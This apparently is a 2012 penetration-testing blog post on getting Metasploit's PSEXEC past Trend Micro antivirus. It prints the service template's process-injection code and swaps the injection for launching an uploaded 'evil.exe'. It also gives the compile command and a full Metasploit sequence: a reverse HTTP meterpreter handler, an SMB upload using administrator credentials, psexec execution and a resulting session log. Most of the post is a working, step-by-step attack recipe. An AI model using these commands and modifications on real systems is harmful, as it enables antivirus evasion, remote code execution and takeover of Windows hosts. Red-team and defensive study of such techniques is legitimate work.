Contents

Bypassing Trend Micro's Service Protection

Contents

@jabjorkhaug posed the following question on Twitter today:

/images/postimages/201207_trendmicro_1.png

I figured I could solve this and it would be an interesting challenge. Here is what it gets detected as:

/images/postimages/201207_trendmicro_2.png

The service binary that is used as part of PSEXEC is located here:

MSF Directory/data/templates/src/pe/exe/service/service.c

The important part to look at starts at line 57:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
#define WIN32_LEAN_AND_MEAN
#include <windows.h>

#define PAYLOAD_SIZE	8192

char cServiceName[32] = "SERVICENAME";

char bPayload[PAYLOAD_SIZE] = "PAYLOAD:";

SERVICE_STATUS ss;

SERVICE_STATUS_HANDLE hStatus = NULL;

/*
 *
 */
BOOL ServiceHandler( DWORD dwControl )
{
	if( dwControl == SERVICE_CONTROL_STOP || dwControl == SERVICE_CONTROL_SHUTDOWN )
	{
		ss.dwWin32ExitCode = 0;
		ss.dwCurrentState  = SERVICE_STOPPED;
	}
	return SetServiceStatus( hStatus, &ss );
}

/*
 *
 */
VOID ServiceMain( DWORD dwNumServicesArgs, LPSTR * lpServiceArgVectors )
{
	CONTEXT Context;
	STARTUPINFO si;
	PROCESS_INFORMATION pi;
	LPVOID lpPayload = NULL;

	ZeroMemory( &ss, sizeof(SERVICE_STATUS) );
	ZeroMemory( &si, sizeof(STARTUPINFO) );
	ZeroMemory( &pi, sizeof(PROCESS_INFORMATION) );

	si.cb = sizeof(STARTUPINFO);

	ss.dwServiceType = SERVICE_WIN32_SHARE_PROCESS;

	ss.dwCurrentState = SERVICE_START_PENDING;

	ss.dwControlsAccepted = SERVICE_ACCEPT_STOP|SERVICE_ACCEPT_SHUTDOWN;

	hStatus = RegisterServiceCtrlHandler( (LPCSTR)&cServiceName, (LPHANDLER_FUNCTION)ServiceHandler );
  
	if ( hStatus )
	{
		ss.dwCurrentState = SERVICE_RUNNING;

		SetServiceStatus( hStatus, &ss );

		if( CreateProcess( NULL, "rundll32.exe", NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi ) )
		{
			Context.ContextFlags = CONTEXT_FULL;
		  
			GetThreadContext( pi.hThread, &Context );
		  
			lpPayload = VirtualAllocEx( pi.hProcess, NULL, PAYLOAD_SIZE, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE );
			if( lpPayload )
			{
				WriteProcessMemory( pi.hProcess, lpPayload, &bPayload, PAYLOAD_SIZE, NULL );
#ifdef _WIN64
				Context.Rip = (DWORD64)lpPayload;
#else
				Context.Eip = (DWORD)lpPayload;
#endif
				SetThreadContext( pi.hThread, &Context );
			}

			ResumeThread( pi.hThread );
			
			CloseHandle( pi.hThread );
		  
			CloseHandle( pi.hProcess );
		}
		
		ServiceHandler( SERVICE_CONTROL_STOP );
		
		ExitProcess( 0 );
	}
}

/*
 *
 */
int __stdcall WinMain( HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow )
{
	SERVICE_TABLE_ENTRY st[] = 
    { 
        { (LPSTR)&cServiceName, (LPSERVICE_MAIN_FUNCTIONA)&ServiceMain }, 
        { NULL, NULL } 
    };
	return StartServiceCtrlDispatcher( (SERVICE_TABLE_ENTRY *)&st );
}

It’s injecting our payload into the service binary and tossing our payload into “rundll32.exe” at run time on the victim (side note: you can change which bin it goes into ;). Lets change this so it doesn’t do any injection and just executes a binary. That removes the ‘injection’ piece and hopefully lets us get our shell. We are loosing a bit of stealth because instead of just one (the service binary) we are writing two binaries.

To make this change you replace the above with just this:

1
2
3
4
if( CreateProcess( NULL, "C:\evil.exe", NULL, NULL, FALSE, DETACHED_PROCESS, NULL, NULL, &si, &pi ) )
{
	CloseHandle( pi.hProcess );
}

Compiling this on OSX using mingw is very easy and is very similar on Ubuntu if you have mingw installed:

1
i386-mingw32-gcc -o service.exe service.c 

Then just copy it to replace the current one:

1
cp service.exe ../../../../template_x86_windows_svc.exe 

No other changes are needed. Only problem is, how do we get the “evil.exe” up onto the box for it to execute? That’s where the auxiliary module “auxiliary/admin/smb/upload_file” comes in :-) I built a resource file to demo the timeline of getting execution with this new service binary (broken up with comments to explain, remove the comments for it to work):

Start Multi Handler

1
2
3
4
5
6
use multi/handler
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 172.16.195.1
set LPORT 80
set ExitOnSession false
exploit -j -z

Upload file to evil.exe on the C$ share (C$ is default for this module so no reason to set it)

1
2
3
4
5
6
7
use auxiliary/admin/smb/upload_file
set LPATH evil.exe
set RPATH evil.exe
set RHOST 172.16.195.155
set SMBUser Administrator
set SMBPass Password1234!
run

Execute PSEXEC using the new service binary that simply executes

1
2
3
4
5
6
7
8
9
use exploit/windows/smb/psexec
set RHOST 172.16.195.155
set SMBUser Administrator
set SMBPass Password1234!
set DisablePayloadHandler true
set PAYLOAD windows/meterpreter/reverse_http
set LHOST 172.16.195.1
set LPORT 80
exploit -j -z

The passwords could have just as easily been hashes, and the end result is:

Well I can’t really show you that nothing was detected… so I guess you just have to believe me when I say:

1
 [*] Meterpreter session 2 opened (172.16.195.1:80 -> 172.16.195.155:49169) at Wed Jul 04 16:02:23 -0400 2012

w00t!